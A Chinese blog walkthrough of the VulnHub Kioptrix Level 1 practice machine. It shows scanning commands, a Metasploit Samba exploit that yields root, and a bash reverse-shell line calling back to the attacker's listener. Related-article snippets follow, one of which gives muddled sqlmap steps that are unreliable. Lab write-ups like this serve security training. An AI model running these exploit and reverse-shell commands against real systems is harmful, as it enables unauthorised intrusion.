vulnhub Kioptrix Level 1通关

最新推荐文章于 2024-05-26 14:49:18 发布
最新推荐文章于 2024-05-26 14:49:18 发布
阅读量368 收藏 9
点赞数 4
CC 4.0 BY-SA版权
文章标签: 靶机通关 网络安全 信息收集 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/137088660
本文详细描述了如何在KioptrixLevel1靶机环境中进行环境安装、IP搜寻、端口扫描,利用Samba漏洞实现RCE,并通过反弹shell获取root权限的过程。作者还分享了一种推荐的通关方法,以及在其中遇到的一个问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

环境安装

信息收集

0X01靶机IP搜寻

1.1ifconfig查看本机IP域

1.2.nmap搜寻IP

2.直接arp-scan指令查看IP

0X02端口扫描

0X03漏洞利用

反弹shell

另一种通关方法推荐

环境安装

靶机下载:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar

攻击机:kali2023

开始渗透!!!

信息收集

0X01靶机IP搜寻

1.1ifconfig查看本机IP域

1.2.nmap搜寻IP

2.直接arp-scan指令查看IP

arp-scan -l

0X02端口扫描

nmap -A -p- 192.168.232.129

发现Samba的绑定服务器的139端口,我们使用msf探测一下Samba的版本

msfconsole
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.232.129
run

0X03漏洞利用

msf搜索samba

search samba

 使用现成的

注意一下可以使用的版本为Samba 2.2.x - Bruteforce所以可以使用

再利用

set payload linux/x86/shell_bind_tcp
set rhosts 192.168.232.129
show options
run

成功rce,已经拿到root权限。

反弹shell

先监听攻击机kali端口1234

nc -lvp 1234

然后就是rce输入反弹shell命令(此处由于kali的IP写错了,多写了几次)

bash -i >& /dev/tcp/192.168.232.128/1234 0>&1

发现成功连接,反弹shell

另一种通关方法推荐

推文:https://www.cnblogs.com/jason-huawen/p/16950944.html

 但是我看在其中一步,没能成功getshell!

Yf3_te
关注
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 2118
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
vulhub靶机通关) XXE LAB: 1
yang1234567898的博客
01-16 2919
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
Vulnhub-LazySysAdmin 通关指南
大方子
11-20 2275
背景 一个孤独和懒惰的系统管理员哭泣自己睡觉的故事 Difficulty:中等/初学者 Goal: ​ 1.教初学者一些基本的Linux枚举技巧 ​ 2.让自己更加熟悉Linux的服务配置,然后创造更多靶机给大家去学习 ​ 3.得到root权限&找到flag   信息收集 先试用nmap确定靶机的IP地址 nmap -sP 192.168.100.0/24 确定靶...
Vulnhub通关手册》——02 Lampiao
weixin_53801131的博客
12-08 1715
Vulnhub通关手册——02 Lampiao 背景概述: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.2.230 1. 信息收集 1.1 扫描目标主机IP 使用nmap进行活跃主机发现,使用命令nmap -sP 192.168.2.0/24,扫描结果如下。 └─$ sudo nmap -sP 192.168.2.0/24 Starting Nmap 7.91 ( https://nmap.org ) at 202
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3938
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
vulnhub——Kioptrix Level 1靶机
jieli0901227的博客
05-26 738
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 756
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
Vulnhub靶机Kioptrix_Level1
qq_48904485的博客
03-12 1213
运行环境:Virtualbox攻击机:kali(192.168.56.101靶机Kioptrix_Level1192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机Kioptrix_Level1.2
qq_48904485的博客
03-14 618
运行环境:Virtualbox攻击机:kali(192.168.56.101靶机Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 1019
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
靶机通关 | vulhub-XXE靶机通关秘籍~
鱼溯的博客
09-20 830
vulhub-XXE靶机通关秘籍~
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 2822
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 1542
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
qq_51577576的博客
03-05 1664
[ vulnhub靶机通关篇 ] Empire Breakout 通关详解
Vulnhub内网渗透Jangow01靶场通关,2024年最新看完直呼内行
04-15 519
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
vulhub - Kioptrix: Level 1 (#1) writeup
Jiajiajiang_的博客
12-03 906
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover netdiscover -i eth0 -r 172.21.137.0/24 发现此靶机IP为172.21.137.46 如果内网...
Kioptrix Level 1靶机通关
nanncy_ma的博客
12-18 516
利用searchsploit Samba 2.2.1a 查看相关版本的samba是否存在漏洞。如果你的vmware是16版本的,记得改VirtualHW.version=“16”(img-iWu3wpkU-1702871600130)]4.重新导入虚拟机,并重新添加网络适配器,修改其模式为NAT。3.下载完靶机后,先把.vmx 文件里删除所有以。开放了samba服务,先从这里入手看下。用msf查看一下samba的版本。,注意并不是从磁盘删除!开头的条目并保存更改。5.确定保存,修改完成。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
热门推荐
qq_51577576的博客
03-14 1万+
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnHub Kioptrix Level 4 通过sqlmap --os shell提权 的详细打靶过程及相应代码
最新发布
10-26
VulnHubKioptrix Level 4是一个常见的渗透测试平台,它模拟了一个Linux服务器环境,挑战玩家通过一系列的安全漏洞进行系统级别的权限提升。在这个级别中,其中一个目标是利用SQL注入漏洞并使用`sqlmap`工具获取数据库shell权限。 **步骤1:识别SQL注入点** 首先,你需要登录到kioptrix服务器,并尝试交互式命令行,可能会发现涉及数据库查询的操作存在输入验证不足,这通常是SQL注入的线索。 **示例命令** (假设使用nc工具连接): ``` nc <Kioptrix IP> <Port> ``` **步骤2:使用sqlmap** 安装sqlmap,你可以使用pip安装: ```bash pip install sqlmap ``` 然后尝试运行sqlmap,传入url和你认为可能的注入点: ```bash sqlmap -u '<URL>' --data='<payload>' --dbs # payload可能是'username=your_username&password=' ``` 这里payload通常包含一些特殊字符,如单引号('), 双引号("),或者空格。 **步骤3:获取数据库信息** 一旦成功注入,sqlmap会尝试列出可用的数据库、表以及获取敏感数据,如用户和密码: ```bash # 获取所有数据库 sqlmap --dbs # 进一步查看特定数据库的表 sqlmap --db=<database_name> --tables # 获取表中的数据 sqlmap --db=<database_name> --table=<table_name> --columns ``` **步骤4:利用shell命令** 如果找到合适的列(比如存放shell路径或可执行文件的列),可以尝试执行SQL命令获取shell,例如: ```bash sqlmap --db=<database_name> --table=<table_name> --column=executable_file --where="id=<target_id>" --dump ``` 这将下载到一个可执行文件,然后尝试使用它作为shell: ```bash wget <file_path> && chmod +x <file_path> && ./<file_path> ``` **注意**: - 操作需谨慎,确保不会触发防火墙或者进一步锁定账户。 - 实际操作过程中可能需要根据服务器的日志和提示调整payload和命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值